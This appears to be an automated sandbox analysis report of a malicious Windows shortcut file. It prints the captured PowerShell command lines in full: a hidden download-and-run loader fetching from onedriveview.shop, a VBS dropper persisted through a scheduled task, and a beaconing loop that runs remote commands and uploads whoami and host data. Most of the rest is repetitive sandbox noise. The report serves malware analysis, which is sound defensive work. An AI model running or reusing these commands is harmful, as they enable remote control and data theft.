              Source: Binary string: ows\dll\System.Core.pdbU source: powershell.exe, 00000000.00000002.1901146654.000001B6FA7C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e.pdbC source: powershell.exe, 00000005.00000002.2771031189.000002536A730000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000012.00000002.4197164578.000001ABEE14D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbDd source: powershell.exe, 00000012.00000002.4197164578.000001ABEE16A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbon FilZ source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbh source: powershell.exe, 00000012.00000002.4194744188.000001ABEDEA1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2771031189.000002536A730000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4197164578.000001ABEE16A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbDI source: powershell.exe, 00000005.00000002.2771031189.000002536A6B3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 089\System.Core.pdb ComC source: powershell.exe, 00000005.00000002.2771031189.000002536A730000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Core.pdbam Fi source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000005.00000002.2771031189.000002536A6B3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.resources.pdbrs source: powershell.exe, 00000005.00000002.2771031189.000002536A730000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 00000012.00000002.4197164578.000001ABEE14D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb.microso2 source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbMPUTER source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiK
              Suspicious powershell command line found
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7100AD pushad ; iretd 0_2_00007FFD9B7100C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7E61FE push cs; ret 0_2_00007FFD9B7E621F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B6E3215 push eax; retf 5_2_00007FFD9B6E3209
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B6E31DD push eax; retf 5_2_00007FFD9B6E3209
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B6E00AD pushad ; iretd 5_2_00007FFD9B6E00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B7B0D69 push ebx; ret 5_2_00007FFD9B7B0D6A

              Persistence and Installation Behavior

              barindex
              Windows shortcut file (LNK) starts blacklisted processes
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
